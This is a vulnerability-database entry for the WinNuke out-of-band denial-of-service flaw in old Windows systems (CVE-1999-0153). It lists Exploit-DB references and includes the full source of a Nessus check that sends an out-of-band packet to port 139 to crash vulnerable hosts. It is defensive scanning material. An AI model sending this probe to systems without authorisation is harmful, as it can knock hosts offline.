Vulnerabilities > CVE-1999-0153

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
microsoft
sco
nessus
exploit available
NVD
Published: 1997-07-01
Updated: 2008-09-09

Summary

Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke.

Vulnerable Configurations

Part Description Count
OS
Microsoft
3
OS
Sco
1

Exploit-Db

  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (1). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20437
    last seen2016-02-02
    modified1997-07-05
    published1997-07-05
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20437/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 1
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (4). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20440
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reportermaddog and lerper
    sourcehttps://www.exploit-db.com/download/20440/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 4
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (2). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20438
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20438/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 2
  • descriptionWindows 3.11/95/NT 4.0/NT 3.5.1 "Out Of Band" Data Denial Of Service (3). CVE-1999-0153 . Dos exploit for windows platform
    idEDB-ID:20439
    last seen2016-02-02
    modified1997-05-07
    published1997-05-07
    reporter_eci
    sourcehttps://www.exploit-db.com/download/20439/
    titleWindows 3.11/95/NT 4.0/NT 3.5.1 - "Out Of Band" Data Denial of Service 3

Nessus

NASL familyDenial of Service
NASL idWINNUKE.NASL
descriptionIt was possible to crash the remote host using the
last seen2020-06-01
modified2020-06-02
plugin id10314
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10314
titleMultiple Vendor Out Of Band Data DoS (WinNuke)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(10314);
  script_version("1.30");
  script_cvs_date("Date: 2018/08/06 14:03:14");

  script_cve_id("CVE-1999-0153");
  script_bugtraq_id(2010);

  script_name(english:"Multiple Vendor Out Of Band Data DoS (WinNuke)");
  script_summary(english:"MSG_OOB against the remote host");

  script_set_attribute(attribute:"synopsis", value:"The remote service is vulnerable to denial of service.");
  script_set_attribute(attribute:"description", value:
"It was possible to crash the remote host using the 'Winnuke' attack,
that is to send an OOB message to this port.

An attacker may use this flaw to make this host crash continuously,
preventing the system from working properly.");
  script_set_attribute(attribute:"see_also", value:"http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-10/att-0333/01-winnuke.c");
  script_set_attribute(attribute:"solution", value:"http://support.microsoft.com/default.aspx?scid=kb;EN-US;179129");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"1997/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
  script_family(english:"Denial of Service");

  script_require_keys("Settings/ParanoidReport");
  script_require_ports(139);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = 139;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  start_denial();
  data = "you are dead";
  send(socket:soc,data:data, option:MSG_OOB);
  close(soc);
  alive = end_denial();
  if(!alive){
  		security_warning(port);
		set_kb_item(name:"Host/dead", value:TRUE);
		}
 }
}

References